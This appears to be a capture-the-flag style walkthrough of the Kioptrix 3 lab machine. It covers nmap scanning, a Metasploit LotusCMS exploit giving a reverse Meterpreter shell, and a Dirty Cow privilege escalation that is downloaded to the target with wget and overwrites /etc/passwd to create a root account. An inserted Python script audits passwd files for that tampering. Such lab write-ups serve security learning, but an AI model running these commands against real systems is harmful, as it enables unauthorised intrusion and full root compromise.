Enumeration:

Starting off with a basic nmap scan, and then going on to enumerate versions, because there are only two services running: SSH and HTTP.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-26 18:53 EST
Nmap scan report for kioptrix3.com (192.168.1.27)
Host is up (0.00024s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:B8:ED:D5 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds

root@spooky:~# nmap -sT -p 22,80 -A 192.168.1.27
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-26 18:53 EST
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for kioptrix3.com (192.168.1.27)
Host is up (0.00030s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:B8:ED:D5 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.30 ms kioptrix3.com (192.168.1.27)
User:

After searching for a while and struggling to gain a foothold, I went back to the beginning and read the blog posts. After reading them I noticed the "Login" page, which I had glanced over. A quick searchsploit lotuscms turned up an RCE vulnerability with a Metasploit module. We can use "msf" to hop into Metasploit, then "search lotuscms" to get the path to the module. To use it we can do:

msf5 > use exploit/multi/http/lcms_php_exec
msf5 exploit(multi/http/lcms_php_exec) >

Next we need to figure out what we need to supply Metasploit with:

msf5 exploit(multi/http/lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host

So it looks like we just need to specify RHOSTS and URI. To do so we can use:

msf5 exploit(multi/http/lcms_php_exec) > set RHOSTS 192.168.1.27
RHOSTS => 192.168.1.27
msf5 exploit(multi/http/lcms_php_exec) > set URI /index.php?system=Admin
URI => /index.php?system=Admin

And to execute it we need to type exploit:

msf5 exploit(multi/http/lcms_php_exec) > exploit

[*] Started reverse TCP handler on 192.168.1.19:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Sending stage (38247 bytes) to 192.168.1.27
[*] Meterpreter session 1 opened (192.168.1.19:4444 -> 192.168.1.27:48904) at 2019-01-26 18:39:57 -0500

meterpreter >
Awesome. We've got a shell; to drop into it we can simply type "shell". While we're at it, we need to figure out who we're running as, what kernel, and what release, for any priv-esc exploits. But first, we should upgrade our shell with:

python -c "import pty; pty.spawn('/bin/bash')"
www-data@Kioptrix3:/home/www/kioptrix3.com$

Perfect, now on to priv esc!
Priv Esc:

www-data@Kioptrix3:/home/www/kioptrix3.com$ uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
www-data@Kioptrix3:/home/www/kioptrix3.com$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
www-data@Kioptrix3:/home/www/kioptrix3.com$
So we're running on quite a dated Linux kernel, which means it's likely that there's a privilege escalation exploit out.

After some googling it looks like the kernel is vulnerable to Dirty Cow, specifically "Pokemon Dirty Cow", CVE-2016-5195. Thanks to FireFart for providing the exploit for us to use. You can check out the exploit on Exploit-DB (https://www.exploit-db.com/exploits/40839). We can wget the raw version on our box:

root@spookysec# wget https://www.exploit-db.com/raw/40839 -O ./dirty.c

Now we need to host the file for Kioptrix3 to download, with a SimpleHTTPServer:

root@spookysec# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80...

And back over on Kioptrix3, we can get the file with:

www-data@Kioptrix3:/tmp$ wget http://192.168.1.19/dirty.c

We can compile our exploit with:

www-data@Kioptrix3:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt

Make the file executable:

www-data@Kioptrix3:/tmp$ chmod +x dirty

And now execute with:

www-data@Kioptrix3:/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: root
Complete line:
firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash
After that the shell froze up, so let's try SSHing in from our box with:

root@spookysec# ssh firefart@192.168.1.27
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
firefart@Kioptrix3:~# id
uid=0(firefart) gid=0(root) groups=0(root)
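Added example, not part of the writeup and not FireFart's PoC code: a small Python audit a defender can run to spot exactly the artifact this exploit leaves behind in /etc/passwd, namely a second uid 0 account whose second field carries a real password hash instead of the "x" placeholder that points at /etc/shadow. The exploit output above says it backed the original file up to /tmp/passwd.bak, so the script also diffs a trusted baseline against the live file. Both passwd files below are constructed samples; the tampered one assumes the generated firefart line took the place of root's entry, which the page itself does not state.

```python
from dataclasses import dataclass

# Constructed baseline, standing in for a known-good copy of /etc/passwd
# (for example one kept by configuration management or a file-integrity tool).
BASELINE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
"""

# Constructed "live" file: the generated line shown in the writeup has replaced
# the root entry (an assumption about where the PoC puts it, not stated on the page).
TAMPERED_PASSWD = """firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
"""


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> list[PasswdEntry]:
    """Parse passwd(5) text: seven colon-separated fields per non-empty line."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, found {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def audit_passwd(text: str) -> list[tuple[str, str]]:
    """Return (finding, account) pairs for a single passwd file."""
    entries = parse_passwd(text)
    findings = []
    for e in entries:
        # Any uid 0 account other than root is a backdoor until proven otherwise.
        if e.uid == 0 and e.name != "root":
            findings.append(("extra-uid0", e.name))
        # On a shadow-enabled system the second field is "x" (or empty) or a lock
        # marker starting with "!" or "*"; a real hash here bypasses /etc/shadow.
        if e.passwd not in ("x", "") and not e.passwd.startswith(("!", "*")):
            findings.append(("hash-in-passwd", e.name))
    # The PoC's generated line can displace root's own entry entirely.
    if not any(e.name == "root" for e in entries):
        findings.append(("root-missing", "root"))
    return findings


def diff_passwd(baseline: str, current: str) -> dict[str, list[str]]:
    """Compare a trusted copy against the live file, keyed by account name."""
    base = {e.name: e for e in parse_passwd(baseline)}
    cur = {e.name: e for e in parse_passwd(current)}
    return {
        "added": sorted(set(cur) - set(base)),
        "removed": sorted(set(base) - set(cur)),
        "changed": sorted(n for n in base.keys() & cur.keys() if base[n] != cur[n]),
    }


if __name__ == "__main__":
    for kind, account in audit_passwd(TAMPERED_PASSWD):
        print(f"{kind}: {account}")
    print(diff_passwd(BASELINE_PASSWD, TAMPERED_PASSWD))
```

On a real host, feed audit_passwd the contents of /etc/passwd and, where a known-good copy exists, pass both to diff_passwd; the three findings the tampered sample produces (an extra uid 0 account, a hash stored in passwd, and a missing root entry) are each independently worth alerting on, since an attacker who keeps root's line intact and only appends a new one would still trip the first two.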
And rooted. This one wasn't too bad. However, the difficulty is starting to kick up a little bit! I haven't done a PWK box like this yet, but that's good. PWK duplicates are great, but variety is needed. We need to be aware of lots of scenarios so we know how to handle them in an effective manner :D